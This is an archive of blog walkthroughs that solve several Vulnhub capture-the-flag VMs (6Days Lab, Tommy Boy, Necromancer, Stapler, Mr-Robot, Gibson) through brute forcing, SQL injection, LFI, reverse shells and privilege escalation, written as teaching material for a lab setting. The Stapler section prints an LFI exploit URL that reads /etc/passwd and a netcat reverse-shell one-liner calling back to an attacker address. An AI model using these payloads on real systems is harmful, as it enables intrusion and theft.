Category Archives: ctf

6Days Lab Vulnhub walkthrough – Battling the Rashomon

Vulnhub has been raining VMs lately, a good mix of challenges which keep me on my toes constantly. 6Days lab was an enjoyable VM with a unique twist which had me pulling my hair out late at night.

You can grab the VM here: https://www.vulnhub.com/entry/6days-lab-11,156/

Let’s go!

As always, I started off with an nmap scan. Standard ports 22 and 80 open with a proxy service on port 8080.

Browsing to the web application I was greeted with a page touting the new Rashomon IPS service which would prove to be the bane of my existence for a few days.

Browsing around I noticed the ‘src’ parameter on the image.php page which is attempting to call an image from an external site. I first thought RFI but no, it could not be that easy. Firing up Burp I passed the request to repeater and saw that we were working with an LFI.

I started off by checking out the source of each of the PHP pages I knew existed.

Checkpromo.php was clearly vulnerable to SQL injection on the ‘promocode’ parameter, but we know there is an IDS in place. More on that later.

The index.php and image.php pages were not particularly exciting. Config.php gave me a glimmer of hope but, aside from the dbname, the credentials were not useful.

From the /etc/passwd file I knew that we had 2 users on the system “user” and “andrea”. Andrea’s shell was set to /bin/andrea. Using our LFI I had a look at this shell script. The readme for the VM mentions sandbox escapes so here is our “sandbox”. Andrea’s shell is set to rbash and all command input is directed to /dev/null, meaning that she can likely run most commands but even if they are successful there will be no feedback on the screen, evil šŸ™‚ .

Back to the web app, we know we are likely dealing with some sort of SQL injection. Flopping around for some time I realized that we can evade the IPS utilizing SSRF to call the checkpromo.php page directly and that we are dealing with a time-based blind SQLi. SQLmap confirmed a time-based blind SQLi for the ‘promocode’ parameter. This was confirmed after attempting all upper and lowercase characters and receiving a 5 second delayed response on “S”, meaning that a password likely started with an “S”. All initial attempts with SQLmap and tamper scripts would not return any data. This was likely due to the size of the payloads being used as well as the proxy.

 

At this point we needed to be able to exploit the SSRF + SQLi with SQLmap (time-based blind SQLi by hand is something I need to work on).

With Burp to the rescue, we are able to set up a match/replace rule to automatically call the vulnerable URL via SSRF.

Chatting with @GKNSB for quite some time we realized that double URL encoding was needed, but only for certain special characters. While I tried to achieve this with some crazy Burp rules (unsuccessfully) @GKNSB whipped up this awesome custom SQLmap tamper script which worked flawlessly.

Armed with this tamper script and knowledge of the database name I was quickly able to pull out Andrea’s password.

And our password.

Armed with the goods I was able to SSH in, directly into the rbash shell šŸ™‚ .

There are other ways to do this but I just took the opportunity to throw myself another shell as www-data to be able to look around the file system freely.

There was a custom binary ‘dog’ in Andrea’s home directory.

I pulled it down with netcat and had a look.

I was not able to fully exploit it as reversing is an area that I am still working on but did find that the dog file expected to be fed a file owned by a user with UID 1001 and would print the contents, otherwise an “Access Denied” message is printed (with some assistance and prodding from @sizzop who always keeps me on my toes).

Main makes a call to stat() (which checks the status of a file, including UID, dates, owner, etc.). When calling stat main checks 2 fields back to back to make sure they are both ‘3E9H”. Highlighting and pressing the ‘H’ key in IDA converts the hex to ‘1001’, confirming that the call to stat() is checking for a file with the UID and GUID 1001:1001 and if the file is owned by that user is will print out “Access Granted” and make a call to readfile() which prints the contents of the file.

To test this I created a test file owned by a user locally with UID and GUID 1001.

Running the dog binary against this confirmed what we have found.

At this point I went back to the VM, thinking that this binary would be useful in reading a file such as /etc/shadow. This did not work which made me think there is a missing piece in using this binary for privilege escalation that I will have to dig into further. I was able to obtain root privileges using a kernel exploit, which is my least favorite method but still got the job done.

And we have our flag.

Shout-out to @1ce7ea for an awesome challenge, @GKNSB for the tamper script which saved me lots of pain, @sizzop for another quick lesson in reversing, and @g0tmi1k for continuing to keep the vulnhub community going.

Tommy Boy:1 vulnhub walkthrough

I saw @7minsec discussing testing going on for his upcoming Tommy Boy VM a few weeks back. I was eagerly awaiting the release of this one as Tommy Boy was a classic movie from my childhood and any VM involving Chris Farley would have to be full of trolls…I was right.

You can grab the VM here: https://www.vulnhub.com/entry/tommy-boy-1,157/

Note from the author:

The primary objective is to restore a backup copy of the homepage to Callahan Auto’s server. However, to consider the box fully pwned, you’ll need to collect 5 flags strewn about the system, and use the data inside them to unlock one final message.

Let’s go!

Started off with an nmap scan of all ports which returned SSH and 2 Apache servers, one running on a non-standard port.

Browsing to port 80 to start I was greeted with the Callahan Auto page which apparently was experiencing some technical difficulties.

A look at the page source provided me my first introduction to Nick Burns as well as some hints.

 

 

I also started compiling a list of possible usernames for later.

I also grabbed flag 1!

I pulled down all the image files and checked them with exiftool for any hidden treasures but came up short.

AHH! Where to now? Oh yeah, the YouTube link in the page source.

Prehistoricforest seemed like a good candidate for our hidden directory…and we’re in! I was greeted by the Callahan Employee Blog on WordPress with 1 protected post and various other posts strewn about.

While here I stopped to grab the second flag.

 

This Nick Burns character was great, hurling insults while trolling me. Nice touch by the author.

I browsed to the /richard directory and was greeted with an image. This time a look with exiftool gave me a clue.

I threw the md5 hash into md5cracker and got a quick result: spanky.

Heading back to the blog I was able to use this password to access the protected post and was greeted with a wealth of information and lots of snark from Nick Burns.

 

At this point I was able to surmise that down the road I would be able to SSH in as Big Tom (username to be determined) and that an FTP server was running on a non-standard port which opened for 15 minutes at the top of the hour and then went down for 15. Nice troll by the author.

I had to wait a bit for the top of the hour and then fired off another nmap scan which showed that port 65534 was now open šŸ™‚

I confirmed it was indeed the Callahan FTP Server.

I tried various brute force attacks but nothing was working, also the port kept going down for me. I slapped together a quick script to monitor the port while I poked around the web server some more.

After a while my little script told me to get back to the FTP.

Since Nick Burns seemed to be an abysmal IT admin I took a guess that he may re-use his username as his password. Trying nickburns:nickburns granted me access!

There was on file accessible and I was restricted to the FTP root directory. Taking a look at the readme I was presented with some additional clues.

I hunted for this directory for a while on port 80 then remembered the nmap scan. For some reason I had seen 8080 earlier, tried that and when it did not connect I gave up. Browsing to I was greeted with another nice message from Nick and a reference to Steve Jobs.

This one threw me for a bit but I remembered that Burp has the ability to change your user-agent (you can do this within the browser as well). However, I have used this particular feature before on client assessments to replace my user-agent with different payloads in attempt to inject JavaScript into any logs that may be available on an admin portion of the application (so far it has worked once in the last year šŸ™‚ ).

Well I passed the dummy test! But Nick Burns is not a gracious man.

So I needed the find a certain .html file using the iOS user-agent from earlier. Dirbuster can do this!

I set up dirbuster with the rockyou.txt wordlist and let it rip.

After a bit I was thrown a result: fallon1.html.

Browsing to this page I was given a hint, the third flag and a password protected zip.

Oh hey flag 3!

The hint broke down for us how Nick Burns chose the password for his password vault.

Based on the specific parameters given another built in Kali tool, Crunch, can help usĀ  generate a custom word list for brute forcing.

I laughed when I saw 58 million combinations.

Our tool of choice for brute forcing a password protected zip is fcrackzip. I fired this up with our new 58 million strong word list and waited and hoped for a hit.

After a while I got what I came for.

I opened up the zip file and was greeted with more clues and trolls.

This next part through me for a loop for a while. I had to get into the wp-admin portal to continue.

The clue was a Queen song. I checked the Tommy Boy soundtrack and there were no Queen songs in the movie. I made several wordlists, one using the names of the top 30 Queen songs on google and mangling them up with l33t rulesets. Nothing. I then used Cewl to create a massive word list using the lyrics from a few well known songs. All these lists against the wp-admin page with my 4 users (tom, richard, tommy, michelle) got me nothing.

I grabbed a couple beers and thought some more on this. Stumped I gave one last effort with rockyou.txt. It had worked earlier so why not.

Firing up WPScan and I had my result quickly.

Thinking back now the clue was right in front of me (We Will Rock You was the Queen song). Great troll and props to the author. Sometimes we don’t notice what is right in front of us šŸ™‚

I signed in to the company blog and found a post in the “drafts” folder.

 

This draft post gave me what I needed to complete Big Tom’s password and (hopefully) get in via SSH.

bigtommysenior:fatguyinalittlecoat1938!! and we’re in!

Scooped up flag 4.

Remembering back from the initial instructions I knew I had to restore the backup of the website.

First task accomplished!

Looking around the file system a bit I found what I believed to be flag 5. But the odd part was that it was owned by www-data and not readable. Ugh!

Looking around the file system some more I found some world writeable directories including one very interesting one.

My first attempt to upload a .php file was rejected so I changed the file name to upload an image file.

This one was accepted!

Since I had access to the server I was able to just rename the .jpg file to a PHP file and get a reverse shell as www-data user.

I proceeded to grab flag 5 and was greeted with one last task.

I threw together all of the flags into the following string and was able to unzip the LOOT.zip file.

Here comes the meat wagon!

Awesome first VM by @7minsec. I always enjoy the VMs that follow a story and keep you on a set path. This one was lighthearted, fun and had the right mix of trolls and some quick wins to keep you motivated. A great addition to Vulnhub and I look forward to the sequel!

Shout-out to @g0tm1lk as always for continuing to maintain this great learning community.

-mrb3n

Necromancer vulnhub walkthrough

New images have been popping up on vulnhub.com left and right, I can hardly keep up. When I saw the latest, The Necromancer by @xerubus, I knew by the title I had to give this one a shot. The description stated that this was more of a CTF type box with 11 total flag.

Download link: https://download.vulnhub.com/necromancer/necromancer.ova

Part way through this one I linked up with @cmaddalena and we commiserated and bounced ideas off each other. We were both stuck at flag 4 for quite some time.

Let’s go!

This one started off like any other, imported the image, booted it up and kicked off an nmap scan once I grabbed its IP. Except, the first scan did not return any open ports, either did the second, or the third. OK, something was blocking/trolling me. I toyed with various scans and only once I threw UDP in the mix did I receive any type of result.

I connected to port 666 and received the message ‘You Gasp for air! Time is running out!’

I toyed with this for a while, even crashing the service and having to restart the VM…not the first time.

Flag 1

I decided to move on for now and fired up Wireshark and noticed that the VM was making ARP requests out to every IP in the subnet, internet. Perhaps, some ARP poisoning? I opened up ettercap to get a better view and could see the machine was calling out to port 4444 on every machine in the subnet. I started up a listener and received my first sign of life.

Hmm, a huge base64 encoded string. I grabbed it, decoded it an was presented with the following message and my first flag!

Welcome!

You find yourself staring towards the horizon, with nothing but silence surrounding you.
You look east, then south, then west, all you can see is a great wasteland of nothingness.

Turning to your north you notice a small flicker of light in the distance.
You walk north towards the flicker of light, only to be stopped by some type of invisible barrier.

The air around you begins to get thicker, and your heart begins to beat against your chest.
You turn to your left.. then to your right!Ā  You are trapped!

You fumble through your pockets.. nothing!
You look down and see you are standing in sand.
Dropping to your knees you begin to dig frantically.

As you dig you notice the barrier extends underground!
Frantically you keep digging and digging until your nails suddenly catch on an object.

You dig further and discover a small wooden box.
flag1{e6078b9b1aac915d11b9fd59791030bf} is engraved on the lid.

You open the box, and find a parchment with the following written on it. “Chant the string of flag1 – u666”

The MD5 decrypted to ‘opensesame’.

Flag 2

I had already thrown various things at port 666 so I ventured a guess with the string from flag 1, and got my 2nd flag!

Flag 3

Based on the information in flag 2, I surmised that port 80 had opened. Visiting it I was presented with the following page:

I checked the page source, nothing, fired off Burp to spider the app and pulled down the image file. Checking the exif data returned nothing useful. Running strings on the file got me the following info, which told me there was likely a ‘feathers.txt’ file embedded within the image.

I could have used Foremost or Binwalk here too but for some decided to convert it to a zip file and unzip it, it worked!

Once I decoded the base64 I was rewarded with flag 3 and another URL, time to cross the chasm.

Flag 4

Oh flag 4, how you haunted me. I spent way too long on this, way, way too long. Finally, after a hint from the author Xerubus that I was looking for something at this URL, I made a custom word list from all the ‘magic items’ I could find out on Google related to necromancers, necromancy and sorcerers. Two of the sites I grabbed info from with Cewl were: http://www.tribality.com/2015/11/02/dd-5e-magic-item-guide/ and http://www.d20srd.org/indexes/magicItems.htm

Running Cewl to create the Wordlist

I set this up in Burp Intruder since Dirbuster was giving me schedule results and timing out often.

A snippet of some of the requests, all resulting in ‘404’ statuses. I didn’t bother to clean up the word list so there was a lot of junk in there.

Eventually I got a hit on ‘talisman’

The file itself was a binary. At first I was disappointed. Binary exploitation is an area that I am still quite weak in, but I need to practice on. After fumbling around for a number of hours I noticed 2 functions ‘wearTalisman’ and ‘chantToBreakSpell’. I spun my wheels for a bit and reached out to @sizzop who is a binary wizard. He threw me a few ideas and some light reading on gdb. After some more fumbling I was successful in setting a breakpoint at the ‘wearTalisman’ function (since this function did not actually reference the ‘chantToBreakSpell’ function and was not going to give me anything no matter how much I begged). Once this was done I ran the program again and, once it hit the breakpoint I set earlier, I directed it to jump directly to the ‘chantToBreakSpell’ function. Here I was greeted with flag 4 and my next clue.

This made me realize that I need to finally go back and work through as many of the binary challenges as I can stomach. It’s all about being well-rounded.

Flag 5

The MD5 from flag 4 decrypted to ‘blackmagic’. I fed this to UDP port 31337 and got my next flag! And another clue.

Flag 6

Browsing to the URL from flag 5 I was greeted with a friendly Necromancer as well as flag 6. Things were starting to heat up.

I was also presented with a download link that turned out to contain a pcap (Wireshark packet capture) file as well as a our next clue, UDP port 161. SNMP?

Flag 7

I loaded the pcap up in Wireshark and was presented with WPA encrypted wireless traffic, interesting. Wireless is another area that I don’t have much experience in.

Google led me to an article about cracking WPA passphrases with aircrack-ng. I set everything up, and fired rockyou.txt at the file.

I had a result, ‘death2all’, relatively quickly.

Next I followed a similar method that I have used to decrypt SSL with a private key, but this time to decrypt the wireless traffic.

I poured over the pcap for a while and nothing really jumped out to me except for the SSID name ‘community’. Perhaps this was a hint to look further into SNMP which was referenced on the webpage from flag 6?

I did a bit of reading as a refresher on SNMP (http://cuddletech.com/articles/snmp/node13.html) and tried my lock with snmpwalk, using ‘death2all’ as the community string.

I was presented with some very promising results and headed back to Google.

“The door is Locked. If you choose to defeat me, the door must be Unlocked.” After some light reading (http://net-snmp.sourceforge.net/wiki/index.php/TUT:snmpset) I determined that I could likely edit the string values. I gave it a shot with snmpsnet, first trying “The door is Unlocked” but did not receive a positive result. Interpreting the earlier message literally I set the string to just ‘Unlocked’ and was rewarded with flag 7 and my next hint. TCP port 22. Time to SSH in and face the Necromancer?

This part was really well done and a unique twist from any of the CTFs I’ve done.

Flag 8

The MD5 from flag 7 decrypted to ‘demonslayer’. I confirmed that port 22 was open and proceeded to try a bunch of combinations of logins with ‘demonslayer’ set as both the username and the password.

Once I realized I was getting nowhere fast I decided to give brute forcing a try with Hydra. Logically, ‘demonslayer’ was likely the username so I combined that username with the rockyou.txt wordlist and had a result pretty quickly.

Logging in as ‘demonslayer’ I was presented with a smiling face. The Necromancer! At last we meet!

Once logged in I had to contain myself and remember this was meant to be a CTF, not necessarily a challenge to get root. I had to find the next flag. Checking demonslayer’s home directory I had my prize and another clue, time to meet the Necromancer face-to-face on UDP port 777.

I first tried to connect remotely, but that didn’t make sense. I was in the Necromancer’s lair after all. I had to fight him there.

Connecting to port 777 locally started the final phase. A notice appeared that I had 3 hitpoints, in this case meaning that after 3 incorrect answers my connection was dropped and I had to re-do the entire scenario to get back to this point. Good thing I had good notes and this only happened once.

For flag 8 I went out to wikipedia (https://en.wikipedia.org/wiki/Tsurani)

Flag 9

I was not familiar with any of these references so I turned to Google once again, the following link got me my answer for flag 9: http://www.liquisearch.com/spirit_of_fire/supporting_characters/johann_faust_viii

Flag 10

At this point I was sweating profusely (I’ll blame the Florida heat) and exhausted. However, the end was in sight and there was no way I was giving up without my prize.

Thank you Google (https://en.wikipedia.org/wiki/List_of_Old_Kingdom_characters) and, flag 10!

Flag 11

I flopped around for a while, then, looking at the problem logically again, checked for hidden files.

Once again I was stuck, due to brain meltdown I had no idea what this final clue was. Had I come this far to not get the final flag? I enumerated the entire file system looking for the flag and eventually came back and re-read the clue. “Great power in your veins”… as in root power? I tried to su to root with demonslayer’s password and was denied. Sigh. Surely this clue meant something, perhaps I could run something as root? Yes I could!

Demonslayer could cat out the final flag hidden in root’s home directory.

The Necromancer was slayed. Wow, what a great feeling. I always enjoy vulnhub challenges but completing this one was a special feeling. This CTF pushed and pulled me in all directions, made me step outside of my comfort zone, showed me where my deficiencies are all while being a ton of fun.

Props to @xerubus for creating this unique and interesting challenge.

As always thanks to @g0tmi1k for maintaining vulnhub as well as everyone in the vulnhub community for continuing to produce these valuable teaching tools.

Until next time!

Stapler: 1 walkthrough (long version)

I decided to take a break from working on the Breach series, partially from burnout and partially due a lack of ideas for finalizing part 3. I took the opportunity to work through g0tmi1k’s Stapler that he put together for the BsidesLondon 2016 Vulnhub workshop. Below I’ll go through 5 ways to achieve a local shell (some dirty/cheap shots but I figured I’d write them up regardless) and 3 separate ways to escalate to root.

You can grab the files here: https://download.vulnhub.com/stapler/Stapler.zip

I. Discovery

I imported the VM and grabbed the IP using netdiscover (you’ll notice I switch to 192.168.110.157 later on as I forgot to set the HDD to non-persisent and rendered the VM, well, unresponsive).

I followed up with an nmap scan and uncovered some interesting services. A full port scan gave me some issues so I ran the top 1000, then top 5000 before digging in.

I also performed a UDP scan and found a few more interesting services (more on that later).

I started by checking the FTP and SSH services. I was able to log in anonymously to the FTP. Along the way I grabbed the banners and a note file.

At this point I started a user list as it appeared that the users Harry, Elly, Barry and John may be valid users on either a web app or the system itself.

Port 80 gave me a ‘Not Found’ error and subsequent enumeration with Burp and dirbuster did not uncover any usable pages.

Following up on port 139, I ran enum4linux which came in handy often in the Offsec PWK labs.

The results are truncated here but I found some shares (including 2 more possible usernames Kathy and Fred).

…and what I was looking for, a full listing of local users.

I fumbled around for a bit, checking for anything useful on port 80 and attempted to authenticate remotely via MySQL without success. I checked out port 12380 via the web browser and found some sort of web app running. The page source had a comment which I saved for later, again confirming another possible user.

I ran Burp and Nikto against port 12380 and received inconclusive results showing a robots.txt file with entries for ‘blogblog’, ‘admin112233’, and ‘phpMyAdmin’. The Nikto results gave me another clue “the site uses SSL…”

Changing over to https I finally had something useful to work with.

Oh hey, a WordPress blog šŸ™‚

I fired up WPscan and enumerated a bunch of usernames (some which I had gathered earlier).

Based on the listing john appeared to be the site admin so I went to work brute forcing his password and grabbed a beer (or 3).

It took a bit but rockyou.txt found the password – john:incorrect.

I attempted to replace the 404.php template with a PHP reverse shell off the bat but was unable to edit the themes. I flopped around for a bit and decided to go check out the Samba shares.

Using John’s password I checked out the ‘tmp’ and ‘kathy’ shares.

The shares held some notes and a WordPress backup. I grabbed the WordPress backup to check for anything useful in the config but it appeared to be a backup of the stock configuration, not the actual site.

II. Exploitation (Local access)

I will go through 5 ways to achieve local access. Some are not purely independent of other issues and some are a bit “dirty” but we’re all about learning here.

1) PHP reverse shell upload via WordPress plugin upload page.

The file upload function on WordPress would not accept PHP or any bypasses that I attempted so I gave the plugin upload a shot. Since directory listing was enabled on /wp-content/uploads I was able to check if my attempts were successful.

2) Shell upload via TFTP over UDP.

I noticed a tftp service running on UDP port 69 early on and attempted an uploaded. You cannot perform a directory listing, but turning on verbose mode it appeared that my upload was successful and perhaps had uploaded directly to the web root on port 80?

I fired up a listener, browsed to where I thought the file was uploaded and got a connection back, nice!

3) SSH Brute Force

Brute forcing is not stealthy and could result in account lockout in the real world. We don’t have to worry about that here so here goes. I made a wordlist of all the user names I had gathered so far and first tried with rockyou.txt. It ran for a while and didn’t uncover anything so I gave it another shot re-using the usernames as passwords. After a bit I got a hit on SHayslett.

4) WordPress Advanced Video Plugin Local File Inclusion (LFI) + Shell via MySQL Remote Authentication

The Advanced Video Plugin is vulnerable to an LFI vulnerability which can be used to read files on the local file system.

There is a exploit on exploit-db which must be fixed up to run properly: https://www.exploit-db.com/exploits/39646. The exploit does not require an authenticated admin session, doh!, and will read the contents of a local file and save the file as a .jpeg image to the /wp-content/uploads directory. The POC goes after the wp-config.php file. More on that. I first grabbed the /etc/passwd file to confirm it worked.

https://192.168.110.157:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=123&short=1&term=1&thumb=../../../../../etc/passwd

I then got greedy and went after /etc/shadow and was denied.

I also attempted to read /var/log/access.log and /log/auth.log in an attempt to leverage to LFI to perform Apache log poisoning and get a web shell but was denied access to these files as well. I spent a while trying to grab files down until I remembered the POC and went after the wp-config.php file.

Now we’re getting somewhere, MySQL DB root credentials.

I was able to access the MySQL instance remotely and spent a long time enumerating the database. After spinning my wheels reading DB tables I decided to try writing out a small PHP web shell using dumpfile. I had grabbed a user listing but that’s about it.

I knew the /wp-content/uploads directory was writeable and with previous SSH access confirmed that the webroot was changed to /var/www/https (I wish I could say I guessed that).

I started up another listener and got a connection back! Careful with those WordPress plugins (I say this as I write this on a WordPress blog).

5) phpMyAdmin Direct Database Access

Using the credentials from part 4 I was able to access the phpMyAdmin console. Access did depend on the info gathered from the LFI but was independent of the MySQL instance allowing remote connections. Following a similar method, I wrote out a web shell.

Browsing to the file, as with part 4, I did not get any feedback from running commands such as /phpmyadmin_shell.php?cmd=whoami however I was able to obtain a reverse shell connection using mknod

mknod /tmp/backpipe p; nc 192.168.110.129 8444 0/tmp/backpipe

III. Privilege Escalation

I found 3 ways to escalate privileges and 1 nice troll which had me spinning my wheels for a while (thanks g0tmi1k!!).

1) Sudo group membership

After obtaining local access, I began enumerating the file system. I noticed that root was running a Python simple HTTP server from /home/JKanode so I went over to check out what else may be hiding in this directory. There was nothing there but the user to forget to clear their bash history before logging out.

Using these credentials I decided to login via SSH directly with ‘JKanode’ and ‘Peter’. Logging in with JKanode first I enumerated the file system for a long time (more to come on that). Logging in with ‘Peter’ gave me my first win. Peter in the sudo group! Entering the command ‘sudo -i’ I was able to gain root privileges.

2) Linux Kernel 4.4.x (Ubuntu 16.04) – double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit

This particular kernel version appeared to be vulnerable to the following kernel exploit: https://www.exploit-db.com/exploits/39772/

I pulled the file over, unzipped, compiled and it ran out of the box.

A quick and easy way to root, though not my favorite as it is basically point and click.

3) World Writeable Cron Script Owned by Root

The final method is by abusing the cron-logrotate.sh script. It was set to run every few minutes (I believe, I forgot to check the frequency).

I logged in via SSH as SHayslett, echo’d a mknod reverse shell to the cron-logrotate.sh script, set up a listener and went chasing trolls.

I checked back a bit later and had a connection back as root. Awesome!

IV. Trolls

There were many notes and comments scattered out throughout the file system (SSH banner, FTP banner, Samba config, various files) that kept me chasing down leads that didn’t amount to anything.

One troll that had me running around for a while was what was running on port 666. It turned out to be a small shell script running from /usr/local/src. The script itself just served up the file ‘nc.zip’ upon successful connection. The zip file contains an image, which has 2 MD5 hashes in the exif data with a comment: “If you are reading this, you should get a cookie!” Haha, thanks guys.

The image was itself was just a screenshot of the nc.txt file within the same directory.

And the hashes

V. Closing

Overall this VM was a lot of fun. It had a little bit of something for everyone and plenty of clues built in that had me running in all directions. I hope this guide is useful for anyone starting out. Due to the length of the post I kept some of the explanations brief, a screenshot speaks a thousand words (sometimes). If you have questions on anything leave a comment or hit me up on Twitter or Freenode in #vulnub or #offsec.

Thanks to g0tmi1k for putting this together and as always for maintaining vulnhub which servers as a great educational tool for many.

Mr-Robot: 1 walkthrough

Download location: https://download.vulnhub.com/mrrobot/mrRobot.ova

Goal: Find 3 keys hidden in different locations

The VM loaded up without an issue and grabbed an IP from DHCP.

I started off with a quick nmap scan, which showed both port 80 and 443 open.

Browsing to both I was greeted with an interactive page which seems to be a clone of https://www.whoismrrobot.com. Really cool added effects.

I went through each of the prompts to make sure there was no command injection before firing up Burp and browsing around/spidering.

The robots.txt file presented me with a dictionary file (perhaps alluding to some sort of brute-forcing_ as well as a key file containing an MD5 hash).

I saved both files down locally and my initial thoughts were confirmed, a custom dictionary file with over 850K lines.

I also had the first of the 3 keys mentioned in the readme. 1 down, 2 to go!

Some more poking around with Burp and I came across a WordPress login page. Since SSH was not enabled this seemed to be a good candidate for brute forcing.

When the default ā€˜adminā€™ username came back as invalid, I was able to guess the user thanks to WordPressā€™ convenient built-in username enumeration.

Below is the result for ā€˜adminā€™ as the username, showing ā€œERROR: Invalid usernameā€:


Conversely, when I tried ā€˜elliotā€™ I was greeted with ā€œERROR: The password you entered for the username Elliot is incorrectā€. Awesome, half way there!

I decided to run WPScan to both search for any WordPress misconfigurations and/or vulnerable plugins as well for its brute forcing function. I kicked off the scan with the username ā€˜elliotā€™ and the ā€˜fsocity.dicā€™ dictionary as the wordlist. While that ran, I kept poking around the site.

I didnā€™t find much else, aside from some trolls hanging around. Several references to the show.

A few hours later (3 hours 30 minutes 48 seconds to be exact)ā€¦ I was presented with a positive result which I am glad I did not wait around for.

In retrospect, had I looked at the dictionary file more closely (doh) I would have noticed it is mostly duplicates (nice troll Jason!).Ā  Sorting and removing the duplicates leaves us with a very few entries.

The password was Elliotā€™s employee ID number from the show. Once logged in I poked around the admin console for a bit and did not turn up anything of note.

A quick win when you have direct access to a WordPress admin console is to replace one of the theme templates with some PHP of your own. I decided to try for a reverse shell by editing the 404.php theme and replacing the contents with the PHP reverse shell from Pentest Monkey.

Browsing to http://192.168.110.153/wp-content/themes/twentytwelve/404.php gave me a hit on my listener. And weā€™re in!

Checking around the file system a bit I could see there was another user named ā€˜robotā€™. This userā€™s home directory held the second key file which I could not readā€¦yet.

I was also presented with the MD5 of the userā€™s password, which I could read.

I threw the MD5 into John and got a quick result.

Using this password I was able to su to the user ā€˜robotā€™ and form here I was able to read the second key file.

2 down! 1 to go.

Digging around the file system as ā€˜robotā€™ I could see an FTP client running on local host which could possibly be leveraged as another route. However, I focused my attention on old version of nmap owned by root with the SUID bit set. Using the ā€œ–interactiveā€ switch I was able to run commands as root.

Using this method I was able to grab the third key file.

I first attempted to throw myself a reverse shell with netcat however even though I could run commands as root the reverse shell still connected back in the context of the user ā€˜robotā€™.

I went for broke and added the user ā€˜robotā€™ to the sudoers.

Now that worked!

Now I was root and dug around a bit to see what was going on with the nmap interactive shell.

This was a fun VM and a welcome break from other things. Thanks to the author, Jason, for putting it together and as always thanks to g0tmi1k and the #vulnhub team for hosting and keeping this awesome community going. Looking forward to the next one!

Key locations:

Key # Location MD5
1 Web root 073403c8a58a1f80d943455fb30724b9
2 Robotā€™s home directory 822c73956184f694993bede3eb39f959
3 Rootā€™s home directory 04787ddef27c3dee1ee161b21670b4e4

Gibson 0.2 vulnhub write-up

I first discovered Vulnhub nearly 2 years ago when I was looking for a career change. In this time I have been through nearly every VM and if it was over my head I have gone through the walkthroughs step-by-step. The work this community does has been instrumental in my learning, preparation for the OSCP and ultimately a career shift from IT audit into application and network penetration testing. I took on the latest VM both to see how far Iā€™ve come and to provide something (hopefully) useful to others fighting tooth and nail to catch-up and get ahead in this industry.

Shout out to @knightmare2600 for creating this challenge, @g0tmi1k for hosting the challenge on @vulnhub and @sizzop for being a great mentor and tearing up my first write-up.

I understand that there are quicker ways to complete this challenge, what follows is the ā€œlong routeā€.

I started off with a quick nmap scan which only turned up ports 22 and 80.

Browsing to port 80 I was greeted with a directory listing and davinci.html page (first of many references to Hackers). The message here will be important much later on. I fired up Dirbuster and let it run for a while but didnā€™t uncover anything useful.

Continued poking around and took a look at the page source of davinci.html. The comment contained SSH credentials. I doubted that theyā€™d work and knew that, if they did, I would still be a long way from my goal.

I successfully SSHd in as Margo and started poking around.

Nothing of note in /var/www/html

Walking through various privilege escalation techniques that served me well in the OSCP labs, ā€˜sudo ā€“lā€™ gave me an interesting result. Margo could run /usr/bin/convert as root, which, if youā€™ve been paying attention, meant that this box was likely vulnerable to the recent ImageMagick RCE vulnerability in the image decoder. (More info here: https://imagetragick.com/)

A quick test with a 1-liner POC showed that I could run commands as root:

I decided to crack the other user passwords to see what else I would have access to. In retrospect this was not necessary and I could have gone directly for root and moved on, however I did not want to leave one stone unturned.

I fired up John with rockyou.txt and had both usersā€™ passwords in seconds.

Again, I could have utilized the ImageMagick vulnerability to edit the sudoers file with vi but decided to dig around the file system as Eugene and ultimately used visudo to add an entry to the sudoers file and su to root.

A quick check to make sure I had root.

Based on the hints I knew that I was far from done and likely would not find the flag directly on this box. The set up instructions alluded to other subnets in play and possible X11 SSH port forwarding.

Netstat showed me a DNS server running at 192.168.122.1 and port 5900 (VNC) listening locally. VNC did not show up in the initial nmap scan, I checked again to make sure. The first thought was that this host was NATd to the 192.168.122.0/24 network.

Ifconfig confirmed this, NATd via the virbr0 interface.

I set up a dynamic port-forwarding rule on my host to check.

Added an entry to the /etc/proxychains.conf file and was off to the races.

Once this port-forwarding rule was established I was able to connect via vncviewer.

I was presented with an apparent FTP server running on FreeDOS 1.1. Some poking around showed that the FTP server was not set up and that netcat and telnet were present. I found what I needed in the c:\GARBAGE directory. I was able to transfer the smaller files over via netcat but had to go ahead and configure the FTP server to transfer the .img file.

I followed this guide to configure the FTP http://freedos.sourceforge.net/wiki/index.php/VirtualBox_-_Chapter_6. Iā€™m not sure if it was just my keyboard or an issue with the FreeDOS set up but the \ key did not work so I had to create the FTP configuration locally.

I uploaded it to the box via netcat.

Once this was done I was able to FTP in but there was one more step, adding Margo to the ftppass.txt file

I was able to edit the ftppass.txt file directly on the remote host.

Once this was done I was able to log in and grab the .img file.

The remainder could be done with forensics tools but I went a different route. I mounted the .img file in /tmp.

The hint file got me closer to the goal. Jonny Lee Miller was in both Hackers and Trainspotting. In 1988 his handle was zerocool. Closer still, but Knightmare wasnā€™t going to give up the flag that easily.

I poked around at the other files and directories. Snake game written in C. I checked the source for something hidden (just in case) and a jpg from Trainspotting which I checked for exiftool for anything hidden.

The prize was waiting for me in the .trash directory. This next part stumped me for quite some time. The hint from the davinci.html page mentioned brute force so it was clear that weā€™d have to brute force the passphrase for the flag.txt.gpg file.

I put together a rudimentary script to attempt all of the variations of ā€˜zerocoolā€™ that I could come up with in a .txt file.Ā  No luck at first. I ended up receiving a hint from Knightmare that I would need to generate a more extensive wordlist, applying l33tspeak rules to it. I have not done too much password cracking or working with wordlist rules so I followed this post: https://www.vankuik.nl/2011-08-30_Creating_specific_password_lists_with_John_the_Ripper. The rules here did not generate the most efficient wordlist and I had to leave the bruteforce running for quite some time. In retrospect the Corelogic rules worked much faster.

After generating the massive wordlist I tried again.

My bash script for brute forcing the passphrase.

The script ran for a long, long, time and eventually coughed up the flag.txt file I was after. It could be improved upon to print out the correct passphrase.